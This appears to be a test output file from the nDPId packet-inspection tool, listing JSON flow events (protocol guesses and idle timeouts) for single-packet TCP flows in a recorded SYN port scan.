-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 